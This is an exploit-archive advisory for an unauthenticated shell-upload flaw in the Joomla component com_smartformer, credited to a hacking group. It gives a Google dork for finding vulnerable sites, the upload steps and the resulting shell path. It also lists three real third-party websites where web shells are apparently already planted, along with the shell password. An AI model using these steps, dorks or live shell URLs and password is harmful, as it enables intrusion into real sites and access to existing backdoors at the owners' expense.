Joomla Component com_smartformer shell upload Vulnerability

2016.05.13

Credit: Hacker Khan

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: inurl:"index.php?option=com_smartformer"

##########################
# Exploit Title: Joomla Component com_smartformer shell upload Vulnerability
# Dork Google : inurl:"index.php?option=com_smartformer"
# We Are Iranian Anonymous
# Home: Iranonymous.org
# Discovered By: Hacker Khan
# Tested on : win
###########################

Exploit  :  Go To

# http://localhost/index.php?option=com_smartformer&Itemid=34

# upload shell.php

# Your shell : http://localhost/components/com_smartformer/files/x.php

############################

# Demo :

# 1) http://www.bmjournal.in/components/com_smartformer/files/x.php

# 2) http://www.advancelitho.co.ke/components/com_smartformer/files/x.php

# 3) http://www.securesystems.com.au/components/com_smartformer/files/x.php

# Shell password => dz0

#############################

#Thanks to : MR.Khatar || ll_azab-siyah_ll || Rising || Blackwolf_Iran ||Ormazd ||Sh@d0w ||

MaMaD_Malware|| OnE_H4Ck3R || Shdmehr || B.D Happy Boy || MR.zarvan || Security Soldier ||

And All Of Iranian Anonymous .

# Discovered By: Hacker Khan

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Joomla Component com_smartformer shell upload Vulnerability

Dork: inurl:"index.php?option=com_smartformer"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.